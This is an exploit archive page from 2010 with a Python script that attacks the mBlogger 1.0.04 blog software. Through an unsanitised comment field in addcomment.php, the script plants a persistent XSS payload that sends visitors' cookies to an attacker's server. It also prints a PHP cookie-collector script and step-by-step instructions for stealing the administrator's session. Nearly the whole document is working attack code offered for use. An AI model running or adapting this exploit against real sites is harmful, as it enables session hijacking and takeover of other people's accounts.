mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit
Posted on 04 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================= mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit ======================================================= #!/usr/bin/python # # Exploit Title: mBlogger v1.0.04 (addcomment.php) Persistent XSS Exploit # Date : 04 September 2010 # Author : Ptrace Security (Gianni Gnesa [gnix]) # Contact : research[at]ptrace-security[dot]com # Software Link: http://sourceforge.net/projects/mblogger/ # Version : 1.0.04 # Tested on : EasyPHP 5.3.1.0 for Windows # # # Description # =========== # # + addcomment.php => An SQL Injection at line 32 allows to insert javascript # that will be executed from the client's browser when he # visits the page viewpost.php?postID=<number>. # # 29: $commentAuthor = $_POST['commentAuthor']; # 30: $commentText = $_POST['commentText']; # 31: $postID = $_GET['postID']; # 32: $query = "INSERT INTO comments (user, comment, postid) VALUES # ('$commentAuthor', '$commentText', '$postID')"; # 33: if(!mysql_query($query, $connection)) # 34: { # 35: die("Error updating post: " . mysql_error()); # 36: } # import sys import http.client import urllib.parse def fatal(message): print(message) exit(1) def usage(program): print('Usage : '+ program +' <victim> <mBlogger path> <attacker> ') print('Example: '+ program +' localhost /mBlogger/ localhost') print(' '+ program +' www.victim.com /path/ www.attacker.com') return def getRemotePHPCode(): source = '<?php ' source += '$cs = explode("; ", $_GET['c']); ' source += '$fp = fopen('data.txt','a'); ' source += 'if(!empty($cs)) ' source += ' foreach($cs as $k => $v) { ' source += ' if(preg_match("/^(.*?)=(.*)$/", $v, $r)) ' source += ' fwrite($fp,urldecode($r[1])."=".urldecode($r[2])."\r\n"); ' source += ' else fwrite($fp, "cannot decode $v"); ' source += ' } ' source += 'fclose($fp); ' source += '?>' return source def injectJavascript(victim, path, attacker): payload = '<script> d=new Image; d.src="http://' + attacker payload += '/c.php?c="+escape(document.cookie); </script> ' headers = {'Content-type':'application/x-www-form-urlencoded','Accept':'text/plain'} params = urllib.parse.urlencode({'commentAuthor':'admin','commentText':payload,'submitcomment':'Submit'}) con = http.client.HTTPConnection(victim) con.request('POST', path + 'addcomment.php?postID=1', params, headers) res = con.getresponse() if res.status != 200: return False con.close() return True def exploit(victim, path, attacker): print('[+] Injecting Javascript') success = injectJavascript(victim, path, attacker) if not success: fatal('[!] Injection failed') print('[+] Generating PHP code for malicious site ') print(getRemotePHPCode() + ' ') print('[?] Instruction to use this exploit:') print(' 1. Save the previous code in http://' + attacker + '/c.php') print(' 2. Wait that the administrator visits ') print(' http://'+ victim +'/'+ path +'viewpost.php?postID=1') print(' 3. Read stolen cookies from http://'+ attacker +'/' + 'data.txt') return print(' +-----------------------------------------------------------------------------+') print('| mBlogger v1.0.04 (addcomment.php) Persistent XSS Exploit by Ptrace Security |') print('+-----------------------------------------------------------------------------+ ') if len(sys.argv) != 4: usage(sys.argv[0]) else: exploit(sys.argv[1],sys.argv[2], sys.argv[3]) # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-04]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
